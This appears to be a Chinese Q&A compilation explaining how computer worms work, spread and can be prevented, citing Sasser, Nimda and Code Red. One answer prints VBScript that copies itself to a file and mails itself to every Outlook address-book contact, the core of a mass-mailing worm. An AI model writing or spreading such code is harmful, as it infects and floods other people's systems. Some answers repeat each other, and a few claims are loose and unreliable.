① 計算機病蠕蟲病毒源代碼是怎麼工作的
蠕蟲病毒是自包含的程序(或是一套程序),它能傳播它自身功能的拷貝或它的某些部分到其 蠕蟲病毒他的計算機系統中(通常是經過網路連接)。請注意,與一般病毒不同,蠕蟲不需要將其自身附著到宿主程序,有兩種類型的蠕蟲:主機蠕蟲與網路蠕蟲。主計算機蠕蟲完全包含在它們運行的計算機中,並且使用網路的連接僅將自身拷貝到其他的計算機中,主計算機蠕蟲在將其自身的拷貝加入到另外的主機後,就會終止它自身(因此在任意給定的時刻,只有一個蠕蟲的拷貝運行),這種蠕蟲有時也叫"野兔",蠕蟲病毒一般是通過1434埠漏洞傳播。
比如近幾年危害很大的「尼姆亞」病毒就是蠕蟲病毒的一種,2007年1月流行的「熊貓燒香」以及其變種也是蠕蟲病毒。這一病毒利用了微軟視窗操作系統的漏洞,計算機感染這一病毒後,會不斷自動撥號上網,並利用文件中的地址信息或者網路共享進行傳播,最終破壞用戶的大部分重要數據。蠕蟲病毒的一般防治方法是:使用具有實時監控功能的殺毒軟體,並且注意不要輕易打開不熟悉的郵件附件。
② 蠕蟲病毒的原理是什麼木馬呢
預防方法就是及時升級殺毒軟體
蠕蟲病毒
蠕蟲病毒和一般的計算機病毒有著很大的區別,對於它,現在還沒有一個成套的理論體系,但是一般認為:蠕蟲病毒是一種通過網路傳播的惡性病毒,它除具有病毒的一些共性外,同時具有自己的一些特徵,如不利用文件寄生(有的只存在於內存中),對網路造成拒絕服務,以及與黑客技術相結合等等。蠕蟲病毒主要的破壞方式是大量的復制自身,然後在網路中傳播,嚴重的佔用有限的網路資源,最終引起整個網路的癱瘓,使用戶不能通過網路進行正常的工作。每一次蠕蟲病毒的爆發都會給全球經濟造成巨大損失,因此它的危害性是十分巨大的;有一些蠕蟲病毒還具有更改用戶文件、將用戶文件自動當附件轉發的功能,更是嚴重的危害到用戶的系統安全。
傳播方式:
蠕蟲病毒常見的傳播方式有2種:
1.利用系統漏洞傳播——蠕蟲病毒利用計算機系統的設計缺陷,通過網路主動的將自己擴散出去。
2.利用電子郵件傳播——蠕蟲病毒將自己隱藏在電子郵件中,隨電子郵件擴散到整個網路中,這也是是個人計算機被感染的主要途徑。
感染對象:
蠕蟲病毒一般不寄生在別的程序中,而多作為一個獨立的程序存在,它感染的對象是全網路中所有的計算機,並且這種感染是主動進行的,所以總是讓人防不勝防。在現今全球網路高度發達的情況下,一種蠕蟲病毒在幾個小時之內蔓延全球並不是什麼困難的事情。
病毒典型代表——震盪波
震盪波(Worm.Sasser)病毒僅感染Windows 2000,Windows XP操作系統。病毒發作時,在本地開辟後門,監聽TCP 5554埠,做為FTP伺服器等待遠程式控制制命令,黑客可以通過這個埠偷竊用戶機器的文件和其他信息。同時,病毒開辟128個掃描線程,以本地IP地址為基礎,取隨機IP地址,瘋狂的試探連接445埠,試圖利用windows的LSASS 中存在一個緩沖區溢出漏洞進行攻擊,一旦攻擊成功會導致對方機器感染此病毒並進行下一輪的傳播,攻擊失敗也會造成對方機器的緩沖區溢出,導致對方機器程序非法操作,以及系統異常等。
③ 蠕蟲的工作原理
蠕蟲的工作原理一般是這樣的:
首先,掃描:由蠕蟲的掃描功能模塊負責探測存在漏洞的主機。隨機選取某一段IP地址,然後對這一地址段上的主機掃描。笨點的掃描程序可能會不斷重復上面這一過程。這樣,隨著蠕蟲的傳播,新感染的主機也開始進行這種掃描,這些掃描程序不知道哪些地址已經被掃描過,它只是簡單的隨機掃描互聯網。於是蠕蟲傳播的越廣,網路上的掃描包就越多。即使掃描程序發出的探測包很小,積少成多,大量蠕蟲程序的掃描引起的網路擁塞就非常嚴重了。
其次,攻擊:當蠕蟲掃描到網路中存在的主機後,就開始利用自身的破壞功能獲取主機的管理員許可權。 最後,利用原主機和新主機的交互將蠕蟲程序復制到新主機並啟動。
掃毒網
由此可見,蠕蟲的危害有兩個方面:
一.蠕蟲大量而快速的復制使得網路上的掃描包迅速增多,造成網路擁塞,佔用大量帶寬,從而使得網路癱瘓。
二.網路上存在漏洞的主機被掃描到以後,會被迅速感染,使得管理員許可權被竊取。方便黑客的攻擊。
魔高一尺,道高一丈,隨著蠕蟲的快速演變,解毒的的高手也不斷涌現。艾泰科技寬頻安全網關系列就採用了「檢測——屏避」的簡單防毒方法。
首先,檢測:這一步驟需要手工來操作,但極為簡單,由於網路中的蠕蟲病毒不斷向外界計算機發出掃描包,這些掃描包是有顯而易見的特點的。例如,被感染的計算機中的蠕蟲病毒會向網路中的某段IP地址發送掃描包。由於網路所來往發送接收的包都要經過路由器,而通過路由器的WEB管理界面就可以輕松看到。所以,蠕蟲病毒攻擊的特點反映在上網監控頁面上就是:感染的主機發出大量的NAT會話,會話中只有上傳包,下載包很小或者為零。如果存在這樣的主機,說明該主機已經被蠕蟲病毒感染。
這種情況下,就要進入第二步,對網路中的主機實施屏蔽。屏蔽的方法是:利用路由器的管理功能建立相應的策略,關閉病毒向外發包的埠。採取殺毒措施或者安裝相應的補丁程序。這樣,就可以輕松搞定蠕蟲病毒。
④ 蠕蟲病毒是什麼激發條件是什麼
蠕蟲病毒是目前計算機病毒中危害最大、破壞能力最強的一種病毒。隨著這種病毒的日益更新,這種病毒已經從被動查找感染目標發展到現在的主動查找感染目標,這種病毒的感染能力極大、感染速度極快。可以在段時間內造成大規模爆發。當蠕蟲病毒爆發時,網路一般馬上癱瘓;計算機則表現出運算速度極慢、系統資源被耗盡、死機、滑鼠移動速度極慢、鍵盤失靈、莫名其妙的計算機提示等等。
蠕蟲病毒感染的理論主要是先通過主動或者被動方式進行掃描,然後利用系統漏洞侵入計算機隱藏起來等候指令,當指令出現時立刻開始感染系統並設法聯系其他蠕蟲節點,命令計算機接受其控制指令而大量發送其病毒指令信息包,造成網路擁堵癱瘓。病毒在計算機中還廣開「後門」,造成計算機不受控制,刪除計算機中的文件和文檔,生成大量病毒垃圾文件,造成計算機無法使用。當然蠕蟲病毒還是有缺陷的,比如其偵察能力有限、擴張能力也有限。爆發是帶有極顯著的特徵,比如網路流量急劇增加。蠕蟲病毒的隱藏地點容易查找,它基本都在郵件中。常見的蠕蟲病毒並且危害極大的有以下幾種:Nimda尼姆達病毒,主要傳播途徑是郵件和IIS漏洞,利用IIS漏洞,造成網路擁塞直至癱瘓。CodeRed紅色代碼,利用IIS安全漏洞進行傳播,破壞計算機主系統並造成計算機不可用,命令計算機大量發送垃圾信息阻斷網路。Happy time 歡樂時光,通過Email和文件共享進行傳播;利用Outlook自動預覽功能大量在網路中繁殖,刪除計算機中的文件,消耗系統資源使計算機無法控制。
⑤ 計算機蠕蟲病毒的工作原理是什麼
一、蠕蟲病毒具有自我復制能力我們以普通的VB腳本為例來看看: Set objFs=CreateObject (「Scripting.FileSystemObject」) '創建一個文件系統對象 objFs.CreateTextFile ("C:\virus.txt", 1) '通過文件系統對象的方法創建了一個TXT文件。 如果我們把這兩句話保存成為.vbs的VB腳本文件,點擊就會在C盤中創建一個TXT文件了。倘若我們把第二句改為: objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")就可以將自身復制到C盤virus.vbs這個文件。本句前面是打開這個腳本文件,WScript.ScriptFullName指明是這個程序本身,是一個完整的路徑文件名。GetFile函數獲得這個文件,Copy函數將這個文件復制到C盤根目錄下virus.vbs這個文件。這么簡單的兩句就實現了自我復制的功能,已經具備病毒的基本特徵――自我復制能力。 二、蠕蟲病毒具有很強的傳播性病毒需要傳播,電子郵件病毒的傳播無疑是通過電子郵件傳播的。對於OutLook來說地址簿的功能相當不錯,可是也給病毒的傳播打開了方便之門。幾乎所有通過OutLook傳播的電子郵件病毒都是向地址簿中存儲的電子郵件地址發送內同相同的腳本附件完成的。看看如下的代碼: Set objOA=Wscript.CreateObject ("Outlook.Application") '創建一個OUTLOOK應用的對象 Set objMapi=objOA.GetNameSpace ("MAPI") '取得MAPI名字空間 For i=1 to objMapi.AddressLists.Count '遍歷地址簿 Set objAddList=objMapi.AddressLists (i) For j=1 To objAddList. AddressEntries.Count Set objMail=objOA.CreateItem (0) objMail.Recipients.Add (objAddList. AddressEntries (j)) '取得收件人郵件地址 objMail.Subject="你好!" '設置郵件主題 objMail.Body="這次給你的附件,是我的新文檔!" '設置信件內容 objMail.Attachments.Add (「c:\virus.vbs") '把自己作為附件擴散出去 objMail.Send '發送郵件 Next Next Set objMapi=Nothing '清空objMapi變數,釋放資源,值得學習的編程習慣 Set objOA=Nothing '清空objOA變數
⑥ 蠕蟲病毒攻擊網路的主要方式是什麼
蠕蟲病毒攻擊網路的主要方式是利用系統漏洞主動攻擊,因不需要宿主程序的限制,蠕蟲病毒可以利用操作系統的各種漏洞進行主動攻擊。
由於IE瀏覽器的漏洞(IFRAMEEXECCOMMAND),使得感染了「尼姆亞」病毒的郵件在不去手工打開附件的情況下病毒就能激活,而此前即便是很多防病毒專家也一直認為,帶有病毒附件的郵件,只要不去打開附件,病毒不會有危害。
(6)計算機網路蠕蟲病毒工作機制擴展閱讀:
防範蠕蟲病毒的方法:
1、選購帶有實時監控功能以及主動防禦功能的殺毒軟體,並且定時檢查殺毒軟體相關功能模塊的運行情況,如有異常及時處理,以防止蠕蟲病毒的感染。
2、經常升級病毒庫,殺毒軟體對病毒的查殺是以病毒的特徵碼為依據的,而病毒每天都層出不窮,尤其是在網路時代,蠕蟲病毒的傳播速度快、變種多,所以必須隨時更新病毒庫,以便能夠查殺最新的病毒。
3、 提高防殺毒意識,不要輕易去點擊陌生的站點,有可能裡面就含有惡意代碼。
5、不隨意查看陌生郵件,尤其是帶有附件的郵件。由於有的病毒郵件能夠利用IE和outlook的漏洞自動執行,所以計算機用戶需要升級IE和outlook程序及常用的其他應用程序。
⑦ 簡要描述下一般病毒與蠕蟲各自破壞的著重性。在線等!
蠕蟲(WORM)病毒是通過分布式網路來擴散特定的信息或錯誤的,進而造成網路伺服器遭到拒絕並發生死鎖。
「蠕蟲」病毒由兩部分組成:一個主程序和另一個是引導程序。主程序一旦在計算機中得到建立,就可以去收集與當前機器聯網的其他機器的信息,它能通過讀取公共配置文件並檢測當前機器的聯網狀態信息,嘗試利用系統的缺陷在遠程機器上建立引導程序。就是這個一般被稱作是引導程序或類似於「釣魚」的小程序,把「蠕蟲」病毒帶入了它所感染的每一台機器中。
「蠕蟲」病毒程序能夠常駐於一台或多台機器中,並有自動重新定位(autorelocation)的能力。假如它能夠檢測到網路中的某台機器沒有被佔用,它就把自身的一個拷貝(一個程序段)發送到那台機器。每個程序段都能把自身的拷貝重新定位於另一台機器上,並且能夠識別出它自己所佔用的哪台機器。
計算機網路系統的建立是為了使多台計算機能夠共享數據資料和外部資源,然而也給計算機蠕蟲病毒帶來了更為有利的生存和傳播的環境。
在網路環境下,蠕蟲病毒可以按指數增長模式進行傳染。蠕蟲病毒侵入計算機網路,可以導致計算機網路效率急劇下降、系統資源遭到嚴重破壞,短時間內造成網路系統的癱瘓。因此網路環境下蠕蟲病毒防治必將成為計算機防毒領域的研究重點。
在網路環境中,蠕蟲病毒具有一些新的特性:
(1)傳染方式多
蠕蟲病毒入侵網路的主要途徑是通過工作站傳播到伺服器硬碟中,再由伺服器的共享目錄傳播到其他的工作站。但蠕蟲病毒的傳染方式比較復雜。
(2)傳播速度快
在單機上,病毒只能通過軟盤從一台計算機傳染到另一台計算機,而在網路中則可以通過網路通信機制,藉助高速電纜進行迅速擴散。
由於蠕蟲病毒在網路中傳染速度非常快,使其擴散范圍很大,不但能迅速傳染區域網內所有計算機,還能通過遠程工作站將蠕蟲病毒在一瞬間傳播到千里之外。
(3)清除難度大
在單機中,再頑固的病毒也可通過刪除帶毒文件、低級格式化硬碟等措施將病毒清除,而網路中只要有一台工作站未能殺毒干凈就可使整個網路重新全部被病毒感染,甚至剛剛完成殺毒工作的一台工作站馬上就能被網上另一台工作站的帶毒程序所傳染,因此,僅對工作站進行病毒殺除不能徹底解決網路蠕蟲病毒的問題。
(4)破壞性強
網路中蠕蟲病毒將直接影響網路的工作狀態,輕則降低速度,影響工作效率,重則造成網路系統的癱瘓,破壞伺服器系統資源,使多年的工作毀於一旦。
檢查方法:1.下載專殺工具 2.利用殺毒軟體 3.在知道何種病毒的情況下上網搜索手工清除方法
⑧ 蠕蟲病毒是靠什麼傳播的怎樣預防
蠕蟲病毒是一種能自我復制的程序,駐留內存並通過計算機網路復制自己。大量消耗系統資源,最後導致系統癱瘓。當然惡性的病毒也有破壞機制,比如刪除磁碟文件,甚至格式化硬碟等。目前流行的蠕蟲病毒主要是通過互聯網傳播,或者藉助網路伺服器傳播。與傳統的病毒感染EXE、COM可執行文件不同,它可以藉助E-mail進行傳播,或者藉助網頁傳播。 預防蠕蟲病毒的最有效方法是安裝實時監控軟體。
希望採納
⑨ 蠕蟲病毒會干什麼會盜號嗎
單獨的蠕蟲不盜號,但目前病毒的發展趨勢是混合型,就是說同時具有蠕蟲,木馬,間諜等各種破壞手段。 蠕蟲(WORM)病毒是通過分布式網路來擴散特定的信息或錯誤的,進而造成網路伺服器遭到拒絕並發生死鎖。 「蠕蟲」病毒由兩部分組成:一個主程序和另一個是引導程序。主程序一旦在計算機中得到建立,就可以去收集與當前機器聯網的其他機器的信息,它能通過讀取公共配置文件並檢測當前機器的聯網狀態信息,嘗試利用系統的缺陷在遠程機器上建立引導程序。就是這個一般被稱作是引導程序或類似於「釣魚」的小程序,把「蠕蟲」病毒帶入了它所感染的每一台機器中。 「蠕蟲」病毒程序能夠常駐於一台或多台機器中,並有自動重新定位(autorelocation)的能力。假如它能夠檢測到網路中的某台機器沒有被佔用,它就把自身的一個拷貝(一個程序段)發送到那台機器。每個程序段都能把自身的拷貝重新定位於另一台機器上,並且能夠識別出它自己所佔用的哪台機器。 計算機網路系統的建立是為了使多台計算機能夠共享數據資料和外部資源,然而也給計算機蠕蟲病毒帶來了更為有利的生存和傳播的環境。 在網路環境下,蠕蟲病毒可以按指數增長模式進行傳染。蠕蟲病毒侵入計算機網路,可以導致計算機網路效率急劇下降、系統資源遭到嚴重破壞,短時間內造成網路系統的癱瘓。因此網路環境下蠕蟲病毒防治必將成為計算機防毒領域的研究重點。 在網路環境中,蠕蟲病毒具有一些新的特性: (1)傳染方式多 蠕蟲病毒入侵網路的主要途徑是通過工作站傳播到伺服器硬碟中,再由伺服器的共享目錄傳播到其他的工作站。但蠕蟲病毒的傳染方式比較復雜。 (2)傳播速度快 在單機上,病毒只能通過軟盤從一台計算機傳染到另一台計算機,而在網路中則可以通過網路通信機制,藉助高速電纜進行迅速擴散。 由於蠕蟲病毒在網路中傳染速度非常快,使其擴散范圍很大,不但能迅速傳染區域網內所有計算機,還能通過遠程工作站將蠕蟲病毒在一瞬間傳播到千里之外。 (3)清除難度大 在單機中,再頑固的病毒也可通過刪除帶毒文件、低級格式化硬碟等措施將病毒清除,而網路中只要有一台工作站未能殺毒干凈就可使整個網路重新全部被病毒感染,甚至剛剛完成殺毒工作的一台工作站馬上就能被網上另一台工作站的帶毒程序所傳染,因此,僅對工作站進行病毒殺除不能徹底解決網路蠕蟲病毒的問題。 (4)破壞性強 網路中蠕蟲病毒將直接影響網路的工作狀態,輕則降低速度,影響工作效率,重則造成網路系統的癱瘓,破壞伺服器系統資源,使多年的工作毀於一旦。 檢查方法:1.下載專殺工具 2.利用殺毒軟體 3.在知道何種病毒的情況下上網搜索手工清除方法
⑩ 網路蠕蟲病毒的傳播方式
蠕蟲一般不採取利用pe格式插入文件的方法,而是復制自身在互聯網環境下進行傳播,病毒的傳染能力主要是針對計算機內的文件系統而言,而蠕蟲病毒的傳染目標是互聯網內的所有計算機。區域網條件下的共享文件夾、電子郵件Email、網路中的惡意網頁、大量存在著漏洞的伺服器等,都成為蠕蟲傳播的良好途徑。網路的發展也使得蠕蟲病毒可以在幾個小時內蔓延全球,而且蠕蟲的主動攻擊性和突然爆發性將使得人們手足無措。 普通病毒 蠕蟲病毒 存在形式 寄存文件 獨立程序 傳染機制 宿主程序運行 主動攻擊 傳染目標 本地文件 網路計算機